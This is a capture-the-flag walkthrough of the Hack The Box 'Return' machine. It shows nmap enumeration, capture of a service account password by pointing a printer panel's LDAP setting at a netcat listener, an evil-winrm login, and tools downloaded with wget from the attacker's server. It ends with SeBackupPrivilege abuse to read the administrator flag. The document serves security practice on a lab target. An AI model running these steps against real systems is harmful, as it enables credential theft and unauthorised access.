HTB: Return

Enumeration

I run nmap and found some ports open.

❯ ports=$(nmap -p- -T4 -Pn -n 10.129.111.124 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

❯ echo $ports 
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49679,49697

❯ nmap -sC -sV -Pn -n -p$ports 10.129.111.124 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 22:55 BST
Nmap scan report for 10.129.111.124
Host is up (0.056s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-08 21:14:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-08T21:15:18
|_  start_date: N/A
|_clock-skew: -41m25s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

I first go to check the web on the port 80, is a printer admin panel. I go to the “settings” tab and found some info about the printer, the server address, port and username:

I also made a scan with nikto, and scan directories with gobuster, but nothing interesting show up.

I check the smb also, and found a printer:

❯ crackmapexec smb 10.129.111.124
SMB         10.129.111.124  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)

User flag

The settings page on the web seems interesting, so I explored it a little. At first glance the “Update” button doesn’t appear to do anything, so I started burpsuite to see if the button is actually sending something. It seems the button is sending a POST request with only the ip, so the other fields are just for decoration:

I tried to put my ip address on the “server address” field, and start tcpdump to see if any packet is received. And as I expected I receive some packages, seems like the server is trying to do something.

❯ sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
00:01:25.580400 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [SEW], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:25.580436 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1735226943, win 0, length 0
00:01:26.148466 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:26.148504 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0
00:01:26.714128 IP 10.129.111.124.60203 > 10.10.14.93.ldap: Flags [S], seq 1735226942, win 64240, options [mss 1285,nop,wscale 8,nop,nop,sackOK], length 0
00:01:26.714169 IP 10.10.14.93.ldap > 10.129.111.124.60203: Flags [R.], seq 0, ack 1, win 0, length 0
^C
6 packets captured
6 packets received by filter
0 packets dropped by kernel

I started a netcat listener on the port 398, and I opened wireshark to see more detailed info of the packages.

❯ sudo nc -lvvnp 389
[sudo] password for user: 
listening on [any] 389 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.111.124] 60243
0*`%return\svc-printer�
                       1edFg43012!!

Seems like netcat captured something, we know “svc-printer” is an user, and “1edFg43012!!” seems like a password. I opened the packet on wireshark to see it more clearly:

So indeed, “1edFg43012!!” is the password. I will try to connect to the machine using evil-winrm:

❯ evil-winrm -i 10.129.111.124 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents>

It worked, so first I took the user flag.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> dir ..\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         5/8/2022   2:12 PM             34 user.txt

Root flag

First I tried to list smb shares using the “svc-printer” user, but nothing interesting:

❯ crackmapexec smb 10.129.111.124 --shares -u svc-printer -p '1edFg43012!!'
SMB         10.129.111.124  445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.129.111.124  445    PRINTER          [+] return.local\svc-printer:1edFg43012!! 
SMB         10.129.111.124  445    PRINTER          [+] Enumerated shares
SMB         10.129.111.124  445    PRINTER          Share           Permissions     Remark
SMB         10.129.111.124  445    PRINTER          -----           -----------     ------
SMB         10.129.111.124  445    PRINTER          ADMIN$          READ            Remote Admin
SMB         10.129.111.124  445    PRINTER          C$              READ,WRITE      Default share
SMB         10.129.111.124  445    PRINTER          IPC$            READ            Remote IPC
SMB         10.129.111.124  445    PRINTER          NETLOGON        READ            Logon server share 
SMB         10.129.111.124  445    PRINTER          SYSVOL          READ            Logon server share 

Time for an enumeration, I uploaded winpeas.exe and execute it.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/winPEASx64.exe -OutFile winpeas.exe
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> .\winpeas.exe

Found something interesting, we are part of the “BUILTIN/Server Operators” group, we can also check this with the “whoami” command:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> 

Searching on google for a way of privesc taking advantage of the fact that we are part of the “Server Operators” group I found this page by \\Cube0x0\ which explains two ways of privesc for this group users. The first privesc that Cube0x0 explain is for reading sensitive files, because we only want the root flag, that should work for us.

I wil first download the two needed .dll from the suggested repository and start the http server to upload them to the target machine:

❯ git clone https://github.com/giuliano108/SeBackupPrivilege.git
[...]

❯ cd SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug 

❯ ls -la
Permissions Size User Date Modified Name
.rw-r--r--   12k user  9 May  1:02  SeBackupPrivilegeCmdLets.dll
.rw-r--r--   16k user  9 May  1:02  SeBackupPrivilegeUtils.dll

❯ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Now I downloaded them on the target:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeCmdLets.dll -OutFile SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> wget 10.10.14.93:8080/SeBackupPrivilegeUtils.dll -OutFile SeBackupPrivilegeUtils.dll

I followed the steps on the Cube0x0 guide and imported both .dll:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll

Now I should be able to traverse (cd into) any directory, local or remote, and list (dir, Get-ChildItem) its contents, so I try to move on to the Administrator home:

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         5/8/2022   2:12 PM             34 root.txt

There is the root flag, but we can’t just type root.txt because we don’t have permissions. Fortunately for my sake, Cube0x0 explains how to read files taking advantage of this vulnerability I just exploited.

I will need to act as a “Backup” software and copy the file to another folder.

To achieve this I need to use the Copy-FileSeBackupPrivilege module we just imported, then I will be able to read it:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\root.txt C:\windows\temp\root.txt -Overwrite
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type C:\windows\temp\root.txt
{flag}

And that’s my flag!

NOTE: In the Cube0x0 guide there is another way to achieve LPE, that way will grant you a cmd as system. If you are curious I encourage you to try it, because of course, a cmd as system is way more useful than just list and/or read any directory/file on the system.

Scroll to Top